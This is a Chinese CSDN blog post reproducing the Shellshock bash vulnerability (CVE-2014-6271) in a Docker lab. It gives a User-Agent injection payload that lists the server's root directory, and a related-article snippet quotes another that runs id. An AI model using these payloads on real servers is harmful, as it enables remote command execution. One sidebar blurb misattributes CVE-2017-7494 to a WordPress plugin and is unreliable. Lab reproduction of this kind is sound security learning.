Shellshock 远程命令注入 (CVE-2014-6271)漏洞复现

最新推荐文章于 2024-08-26 17:34:11 发布
最新推荐文章于 2024-08-26 17:34:11 发布
阅读量151 收藏
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56537388/article/details/134313673
版权

漏洞描述

Safe.cgi 由最新版本的 bash 生成,victim.cgi 是 bash4.3 生成的页面,容易受到 shellshock 的影响。

我们可以在访问 victim.cgi 时在用户代理字符串中发送包含我们的有效负载,并且命令成功执行

漏洞环境及利用

搭建docker环境

访问ip:8080/victim.cgi 抓包修改UA头

() { :;};echo ; echo; echo $(/bin/ls /);

blackK_YC
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulhub-Shellshock Remote Command Injection (CVE-2014-6271)
ad12456的博客
05-18 461
Shellshock远程命令注入
详细的漏洞复现Shellshock CVE-2014-6271 CVE-2014-7169
dongchijue7318的博客
09-11 1469
目录 前言 漏洞原理 利用方式 复现过程 1. 环境准备 (1) 为容器配置固定IP地址 (2) 查看bash版本 2. 本地验证:测试镜像系统是否存在漏洞 3. 远程模拟验证(原理验证) ...
Shellshock远程命令注入 CVE-2014-6271 漏洞复现
ADummy的博客
03-04 748
Shellshock远程命令注入CVE-2014-6271) by ADummy 0x00利用路线 ​ Burpsuite发包—>命令执行 0x01漏洞介绍 ​ CVE-2014-6271(即“破壳”漏洞)广泛存在与GNU Bash 版本小于等于4.3的*inux的系统之中,只要目标服务器开放着与Bash相交互的应用与服务,就有可能成功触发漏洞,获取目标系统当前Bash运行用户相同权限的shell接口 0x 02漏洞复现 当您访问时,http://your-ip/您应该看到两个文件: saf
shellshock-shell:针对 Shellschok CVE-2014-6271 错误的一个简单的类似 python shell漏洞利用
07-10
shellshock-shell 针对 Shellschok CVE-2014-6271 错误的一个简单的类似 python shell漏洞利用。 使用它来利用已知的易受攻击的 URL。 此工具只能在您自己的授权 URL 上使用。 此工具的作者对其使用不承担任何责任。 文件名:shellshock.py 作者:Sagi Levy - 创建日期:27/09/2014 Python 版本:2.7 示例:./shellshock.py -u
Shellshock 破壳漏洞CVE-2014-6271
EC_Carrot的博客
07-29 486
漏洞简介 GNU Bash 4.3及之前版本中存在安全漏洞,该漏洞源于程序没有正确处理环境变量值内的函数定义。远程攻击者可借助特制的环境变量利用该漏洞执行任意代码。 漏洞复现 将payload附在User-Agent中访问victim.cgi,即可执行命令: User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id ...
命令注入Shellshock漏洞复现CVE-2014-6271
SmileAssassn的博客
01-23 576
命令注入Shellshock漏洞复现CVE-2014-6271
Shellshock-破壳漏洞bash命令执行 CVE-2014-6271
weixin_47536169的博客
08-29 1514
Shellshock-破壳漏洞bash命令执行 CVE-2014-6271
CVE-2014-6271漏洞复现
王嘟嘟的博客
01-16 3095
0x00 前言 要是平时我肯定不会想打去复现这个漏洞的,但是由于需要学习shellshock漏洞的利用,所以这里可以进行一下复现 0x01 正文 这里直接使用别人弄好的docker,简单又方便 docker pull hmlio/vaas-cve-2014-6271 下载完成之后,开启docker docker run -d -p 80:80 hmlio/vaas-cve-2014-6271 访问...
破壳漏洞(CVE-2014-6271)综合分析1
08-04
【破壳漏洞(CVE-2014-6271)综合分析】 一、威胁卡片 破壳漏洞,也称为Bash Shellshock,是由法国的安全研究员Stéphane Chazelas在2014年9月中旬发现的。这个漏洞被赋予了CVE编号CVE-2014-6271,属于A级威胁响应...
shellshocker-python:这是一个 Python 应用程序,可帮助您检测运行 bash 的计算机是否存在 CVE-2014-6271 漏洞
06-23
Shellshocker 是一个著名的安全漏洞,发生在 2014 年,具体称为 CVE-2014-6271,也被称作“Bash 漏洞”或“Shellshock 漏洞”。这个漏洞影响了广泛使用的 Unix 和 Linux 系统中的 Bash(Bourne-Again SHell命令...
shellshock-cgi:一个 Python 脚本,用于枚举特定服务器上易受 CVE-2014-6271 攻击的 CGI 脚本
05-29
一个 Python 脚本,用于枚举特定服务器上易受 CVE-2014-6271 攻击的 CGI 脚本 用法 $ python testing.py --server 172.16.255.130 --listen 172.16.255.1 ##示例返回: [+] Testing if 172.16.255.130 is ...
ShellShock-CGI-Scan:用C语言编写的脚本,用于检查CGI脚本是否容易受到CVE-2014-6271的攻击(The Bash Bug)
05-25
用C语言编写的脚本,用于检查CGI脚本是否容易受到CVE-2014-6271(The Bash Bug)的攻击。 选项: -i (local ip-address) -p (port to listen) -l (site list) -t (connection timeout) (Default: 15s) 示例:$ ./...
如何使用双重IP代理实现更安全的网络访问
IPIPGO的博客
08-26 369
双重IP代理,顾名思义,就是在原有的代理IP基础上,再添加一层代理。这样,当你访问目标网站时,数据会先经过第一个代理服务器,再经过第二个代理服务器,最后到达目标网站。这种方式不仅能更好地保护你的隐私,还能有效防止IP被封禁。通过本文的介绍,相信你已经掌握了如何使用Java实现双重IP代理的方法。双重IP代理不仅能帮助我们更好地保护隐私,还能有效防止IP被封。在实际应用中,合理使用双重代理IP,将会使你的网络访问更加安全和高效。希望本文对你有所帮助,祝你在网络技术的道路上越走越远!t=N7T8。
网络安全教程初级简介
网络研究观
08-26 396
网络安全包括一系列技术、流程和实践,用于保护网络、设备、应用程序和数据免受攻击、盗窃或损坏等威胁。
【宝马中国-注册/登录安全分析报告】
08-26 900
宝马中国作为全世界最成功的汽车和摩托车制造商之一的宝马集团旗下公司, 其滑动验证码没有采用市场常用的几家, 有独特的地方, 背景图在被抠出后,并不是采用同行的常用的透明化保留原有图形样式,而是填充白色,所以滑块位置识别需要从背景图中提取, 这样让识别变得更简单,造成这中特点有两方面原因,1 直接填充白色背景的技术比透明度的方式更简单2 从报文看未获取轨迹数据, 显示验证方式中并未验证轨迹,只验证距离是否合适很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。
基于视觉识别引擎+深度学习实现安全保障数字化的智慧城管开源了
最新发布
weixin_63598920的博客
08-26 355
智慧城管视觉监控平台是一款功能强大且简单易用的实时算法视频监控系统。它的愿景是最底层打通各大芯片厂商相互间的壁垒,省去繁琐重复的适配流程,实现芯片、算法、应用的全流程组合,从而大大减少企业级应用约95%的开发成本。用户只需在界面上进行简单的操作,就可以实现全视频的接入及布控。
等保测评中的安全测试方法
w13359990065的博客
08-26 466
通过物理环境测评、网络安全测评、主机安全测评、应用安全测评和数据安全测评等多层次的综合评估,可以有效识别系统中的安全隐患,提升信息系统的整体安全防护能力,满足国家相关法律法规的要求,助力企业提升行业竞争力。在等保测评中,安全测试方法的有效实施离不开专业的测评团队和科学的测评流程。测评团队需具备丰富的安全测试经验和专业知识,能够准确识别系统中的安全风险并提出切实可行的整改建议。首先,等保测评中的安全测试方法涵盖了多个层面,包括但不限于物理环境测评、网络安全测评、主机安全测评、应用安全测评和数据安全测评。
92.WEB渗透测试-信息收集-Google语法(6)
计算机王的博客
08-22 416
web渗透测试
cve-2017-7494
06-13
CVE-2017-7494是一个知名的网络安全漏洞,它影响的是WordPress平台的一个插件,具体来说是"Layered Tech Marketing Platform"插件中的一个安全漏洞。这个漏洞被称为"Shellshock(波加莱尔)"或"BASH bug",源于Linux...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值